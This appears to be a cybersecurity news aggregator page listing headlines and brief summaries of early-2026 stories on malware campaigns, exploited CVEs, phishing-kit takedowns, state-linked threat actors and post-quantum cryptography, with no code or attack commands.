Microsoft on Thursday disclosed details of a new widespread ClickFix social engineering campaign that has leveraged the Windows Terminal app as a way to activate a sophisticated attack chain and deploy the Lumma Stealer malware. The activity, observed in February 2026, makes use of the terminal emulator program instead of instructing users to launch the Windows Run dialog and paste a command
Hikvision and Rockwell Automation CVSS 9.8 Flaws Added to CISA KEV Catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added two security flaws impacting Hikvision and Rockwell Automation products to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The critical-severity vulnerabilities are listed below - CVE-2017-7921 (CVSS score: 9.8) - An improper authentication vulnerability affecting
Cisco Confirms Active Exploitation of Two Catalyst SD-WAN Manager Vulnerabilities
Cisco has disclosed that two more vulnerabilities affecting Catalyst SD-WAN Manager (formerly SD-WAN vManage) have come under active exploitation in the wild. The vulnerabilities in question are listed below - CVE-2026-20122 (CVSS score: 7.1) - An arbitrary file overwrite vulnerability that could allow an authenticated, remote attacker to overwrite arbitrary files on the local file system.
Preparing for the Quantum Era: Post-Quantum Cryptography Webinar for Security Leaders
Most organizations assume encrypted data is safe. But many attackers are already preparing for a future where today’s encryption can be broken. Instead of trying to decrypt information now, they are collecting encrypted data and storing it so it can be decrypted later using quantum computers. This tactic—known as “harvest now, decrypt later”—means sensitive data transmitted today could become
ThreatsDay Bulletin: DDR5 Bot Scalping, Samsung TV Tracking, Reddit Privacy Fine & More
Some weeks in cybersecurity feel routine. This one doesn’t. Several new developments surfaced over the past few days, showing how quickly the threat landscape keeps shifting. Researchers uncovered fresh activity, security teams shared new findings, and a few unexpected moves from major tech companies also drew attention. Together, these updates offer a useful snapshot of what is happening
Dust Specter Targets Iraqi Officials with New SPLITDROP and GHOSTFORM Malware
A suspected Iran-nexus threat actor has been attributed to a campaign targeting government officials in Iraq by impersonating the country's Ministry of Foreign Affairs to deliver a set of never-before-seen malware. Zscaler ThreatLabz, which observed the activity in January 2026, is tracking the cluster under the name Dust Specter. The attacks, which manifest in the form of two different
Where Multi-Factor Authentication Stops and Credential Abuse Starts
Organizations typically roll out multi-factor authentication (MFA) and assume stolen passwords are no longer enough to access systems. In Windows environments, that assumption is often wrong. Attackers still compromise networks every day using valid credentials. The issue is not MFA itself, but coverage. Enforced through an identity provider (IdP) such as Microsoft Entra ID, Okta, or
APT28-Linked Campaign Deploys BadPaw Loader and MeowMeow Backdoor in Ukraine
Cybersecurity researchers have disclosed details of a new Russian cyber campaign that has targeted Ukrainian entities with two previously undocumented malware families named BadPaw and MeowMeow. "The attack chain initiates with a phishing email containing a link to a ZIP archive. Once extracted, an initial HTA file displays a lure document written in Ukrainian concerning border crossing appeals
Europol-Led Operation Takes Down Tycoon 2FA Phishing-as-a-Service Linked to 64,000 Attacks
Tycoon 2FA, one of the prominent phishing-as-a-service (PhaaS) toolkits that allowed cybercriminals to stage adversary-in-the-middle (AitM) credential harvesting attacks at scale, was dismantled by a coalition of law enforcement agencies and security companies. The subscription-based phishing kit, which first emerged in August 2023, was described by Europol as one of the largest phishing
FBI and Europol Seize LeakBase Forum Used to Trade Stolen Credentials
A joint law enforcement operation has dismantled LeakBase, one of the world's largest online forums for cybercriminals to buy and sell stolen data and cybercrime tools. The LeakBase forum, per the U.S. Department of Justice (DoJ), had over 142,000 members and more than 215,000 messages between members as of December 2025. Those attempting to access the forum's website ("leakbase[.]la") are now
149 Hacktivist DDoS Attacks Hit 110 Organizations in 16 Countries After Middle East Conflict
Cybersecurity researchers have warned of a surge in retaliatory hacktivist activity following the U.S.-Israel coordinated military campaign against Iran, codenamed Epic Fury and Roaring Lion. "The hacktivist threat in the Middle East is highly lopsided, with two groups, Keymous+ and DieNet, driving nearly 70% of all attack activity between February 28 and March 2," Radware said in a Tuesday
Coruna iOS Exploit Kit Uses 23 Exploits Across Five Chains Targeting iOS 13–17.2.1
Google said it identified a "new and powerful" exploit kit dubbed Coruna (aka CryptoWaters) targeting Apple iPhone models running iOS versions between 13.0 and 17.2.1. The exploit kit featured five full iOS exploit chains and a total of 23 exploits, Google Threat Intelligence Group (GTIG) said. It's not effective against the latest version of iOS. The findings were first reported by WIRED. "The
New RFP Template for AI Usage Control and AI Governance
As AI becomes the central engine for enterprise productivity, security leaders are finally getting the green light — and the budget — to secure it. But there’s a quiet crisis unfolding in the boardroom: many organizations know they need "AI Governance," but they have no idea what they are actually looking for. The CISO’s Dilemma: You Have the AI Budget, but Do You Have the Requirements? As AI
Fake Laravel Packages on Packagist Deploy RAT on Windows, macOS, and Linux
Cybersecurity researchers have flagged malicious Packagist PHP packages masquerading as Laravel utilities that act as a conduit for a cross-platform remote access trojan (RAT) that's functional on Windows, macOS, and Linux systems. The names of the packages are listed below - nhattuanbl/lara-helper (37 Downloads) nhattuanbl/simple-queue (29 Downloads) nhattuanbl/lara-swagger (49 Downloads)
APT41-Linked Silver Dragon Targets Governments Using Cobalt Strike and Google Drive C2
Cybersecurity researchers have disclosed details of an advanced persistent threat (APT) group dubbed Silver Dragon that has been linked to cyber attacks targeting entities in Europe and Southeast Asia since at least mid-2024. "Silver Dragon gains its initial access by exploiting public-facing internet servers and by delivering phishing emails that contain malicious attachments," Check Point said
CISA Adds Actively Exploited VMware Aria Operations Flaw CVE-2026-22719 to KEV Catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a recently disclosed security flaw impacting Broadcom VMware Aria Operations to its Known Exploited Vulnerabilities (KEV) catalog, citing active exploitation in the wild. The high-severity vulnerability, CVE-2026-22719 (CVSS score: 8.1), has been described as a case of command injection that could allow an
Fake Tech Support Spam Deploys Customized Havoc C2 Across Organizations
Threat hunters have called attention to a new campaign as part of which bad actors masqueraded as fake IT support to deliver the Havoc command-and-control (C2) framework as a precursor to data exfiltration or ransomware attack. The intrusions, identified by Huntress last month across five partner organizations, involved the threat actors using email spam as lures, followed by a phone call from
Building a High-Impact Tier 1: The 3 Steps CISOs Must Follow
Every CISO knows the uncomfortable truth about their Security Operations Center: the people most responsible for catching threats in real time are the people with the least experience. Tier 1 analysts sit at the front line of detection, and yet they are also the most vulnerable to the cognitive and organizational pressures that quietly erode SOC performance over time. The Paradox at the Gate:
Open-Source CyberStrikeAI Deployed in AI-Driven FortiGate Attacks Across 55 Countries
The threat actor behind the recently disclosed artificial intelligence (AI)-assisted campaign targeting Fortinet FortiGate appliances leveraged an open-source, AI-native security testing platform called CyberStrikeAI to execute the attacks. The new findings come from Team Cymru, which detected its use following an analysis of the IP address ("212.11.64[.]250") that was used by the suspected
AI Agents: The Next Wave Identity Dark Matter - Powerful, Invisible, and Unmanaged
The Rise of MCPs in the Enterprise The Model Context Protocol (MCP) is quickly becoming a practical way to push LLMs from “chat” into real work. By providing structured access to applications, APIs, and data, MCP enables prompt-driven AI agents that can retrieve information, take action, and automate end-to-end business workflows across the enterprise. This is already showing up in production
Starkiller Phishing Suite Uses AitM Reverse Proxy to Bypass Multi-Factor Authentication
Cybersecurity researchers have disclosed details of a new phishing suite called Starkiller that proxies legitimate login pages to bypass multi-factor authentication (MFA) protections. It's advertised as a cybercrime platform by a threat group calling itself Jinkusu, granting customers access to a dashboard that lets them select a brand to impersonate or enter a brand's real URL. It also lets
Microsoft Warns OAuth Redirect Abuse Delivers Malware to Government Targets
Microsoft on Monday warned of phishing campaigns that employ phishing emails and OAuth URL redirection mechanisms to bypass conventional phishing defenses implemented in email and browsers. The activity, the company said, targets government and public-sector organizations with the end goal of redirecting victims to attacker-controlled infrastructure without stealing their tokens. It described
Google Confirms CVE-2026-21385 in Qualcomm Android Component Exploited
Google on Monday disclosed that a high-severity security flaw impacting an open-source Qualcomm component used in Android devices has been exploited in the wild. The vulnerability in question is CVE-2026-21385 (CVSS score: 7.8), a buffer over-read in the Graphics component. "Memory corruption when adding user-supplied data without checking available buffer space," Qualcomm said in an advisory,
SloppyLemming Targets Pakistan and Bangladesh Governments Using Dual Malware Chains
The threat activity cluster known as SloppyLemming has been attributed to a fresh set of attacks targeting government entities and critical infrastructure operators in Pakistan and Bangladesh. The activity, per Arctic Wolf, took place between January 2025 and January 2026. It involves the use of two distinct attack chains to deliver malware families tracked as BurrowShell and a Rust-based
New Chrome Vulnerability Lets Malicious Extensions Escalate Privileges via Gemini Panel
Cybersecurity researchers have disclosed details of a now-patched security flaw in Google Chrome that could have permitted attackers to escalate privileges and gain access to local files on the system. The vulnerability, tracked as CVE-2026-0628 (CVSS score: 8.8), has been described as a case of insufficient policy enforcement in the WebView tag. It was patched by Google in early January 2026
Google Develops Merkle Tree Certificates to Enable Quantum-Resistant HTTPS in Chrome
Google has announced a new program in its Chrome browser to ensure that HTTPS certificates are secure against the future risk posed by quantum computers. "To ensure the scalability and efficiency of the ecosystem, Chrome has no immediate plan to add traditional X.509 certificates containing post-quantum cryptography to the Chrome Root Store," the Chrome Secure Web and Networking Team said. "
More sources will be added in due course from other feeds.